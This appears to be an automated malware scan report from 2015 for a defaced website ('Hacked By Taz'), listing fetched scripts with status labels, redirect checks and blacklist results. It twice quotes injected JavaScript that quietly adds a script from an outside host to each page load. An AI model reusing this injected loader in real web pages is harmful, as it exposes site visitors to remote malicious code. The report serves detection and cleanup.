Scanned pages/files
| Request | Server response | Status |
http://triplestatehome.com/ | 200 OK Content-Length: 10369 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) if(top == self && typeof window._ws_all_js==='undefined'){
window._ws_all_js = 7; var zhead = document.getElementsByTagName('head')[0]; if(!zhead){zhead = document.createElement('head');} var qscript = document.createElement('script'); qscript.setAttribute('id','wsh2_js'); qscript.setAttribute('src','http://jswrite.com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By Taz ...[1149 bytes skipped]... com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } </script> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title> Hacked By Taz </title> <meta name="description" content="We Are The Lights In The Darkness, We Are the Truth Behind The Lies, We Are M_L crew, It's Too Late To Expect Us!"> <meta name="author" content="M_L Crew"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link REL="SHORTCUT ICON" HREF="http://i58.tinypic.com/14cdu6o.jpg"> <!-- CSS concatenated and minifie ...[10765 bytes skipped]... | ||
http://erin-erina.meximas.com/js/libs/modernizr-2.0.6.min.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:02 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://www.hostinger.lt/klaida_404? | 200 OK Content-Length: 11736 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/jquery-ui.min.js | 200 OK Content-Length: 201658 Content-Type: text/javascript | clean |
http://erin-erina.meximas.com/js/site.php | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:04 GMT Server: nginx/1.7.11 Content-Type: text/html; charset=UTF-8 | clean |
http://www.hostinger.lt/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://erin-erina.meximas.com/js/popup.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:05 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://i.kuryjs.info/kury/javascript.js?appTitle=Smartbar&channel=src2_pr&hid=3e05eee2-d832-47b7-b607-7a163fbc72ed | 200 OK Content-Length: 7177 Content-Type: application/x-javascript | clean |
http://www.superfish.com/ws/sf_main.jsp?dlsource=fowpwbb&userId=16AF47B9-805A-4B2C-8D0&CTID=src2_pr&partnername=Smartbar | 200 OK Content-Length: 0 Content-Type: image/png | clean |
http://linurytestwesteurope.blob.core.windows.net/sharon-test/visadd.js | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://cdn.visadd.com/script/14567725814/preload.js?subid=src2_pr | 200 OK Content-Length: 9348 Content-Type: application/javascript | clean |
http://api.jollywallet.com/affiliate/client?dist=100&sub=2_pr&name=Smartbar | 200 OK Content-Length: 39880 Content-Type: application/javascript | clean |
http://apisurftasticnet-a.akamaihd.net/gsrs?is=amp1lmeg&bp=PB&g=f47f4329-19a1-4111-a256-13a763f5939d | 200 OK Content-Length: 11268 Content-Type: application/javascript | clean |
http://yondarkness.googlecode.com/files/AntiCopas.js | 403 Forbidden Content-Length: 2155 Content-Type: text/html | clean |
http://yondarkness.googlecode.com//www.google.com/ | 404 Not Found Content-Length: 1425 Content-Type: text/html | clean |
http://triplestatehome.com//ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js/ | 200 OK Content-Length: 10369 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(top == self && typeof window._ws_all_js==='undefined'){
window._ws_all_js = 7; var zhead = document.getElementsByTagName('head')[0]; if(!zhead){zhead = document.createElement('head');} var qscript = document.createElement('script'); qscript.setAttribute('id','wsh2_js'); qscript.setAttribute('src','http://jswrite.com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } Antivirus reports:
| ||
http://erin-erina.meximas.com/js/mylibs/supersized.3.1.3.min.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:10 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://erin-erina.meximas.com/js/mylibs/jquery.mousewheel.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:10 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://erin-erina.meximas.com/js/mylibs/mwheelIntent.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:11 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://erin-erina.meximas.com/js/mylibs/jquery.jscrollpane3.min.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:11 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://erin-erina.meximas.com/js/plugins.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:11 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://erin-erina.meximas.com/js/script.js | HTTP/1.1 200 OK Connection: close Date: Wed, 01 Jul 2015 03:16:12 GMT Server: nginx/1.7.11 Vary: Accept-Encoding Content-Type: text/html | clean |
http://htmlfreecodes.com/codes/rain.js | 200 OK Content-Length: 7113 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: triplestatehome.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Jul 2015 03:16:02 GMT
Server: Apache
Content-Type: text/html
GET / HTTP/1.1
Host: triplestatehome.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Jul 2015 03:16:02 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: triplestatehome.com
Referer: http://www.google.com/search?q=triplestatehome.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: triplestatehome.com
Referer: http://www.google.com/search?q=triplestatehome.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=triplestatehome.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://triplestatehome.com/
Result: triplestatehome.com is not infected or malware details are not published yet.
Result: triplestatehome.com is not infected or malware details are not published yet.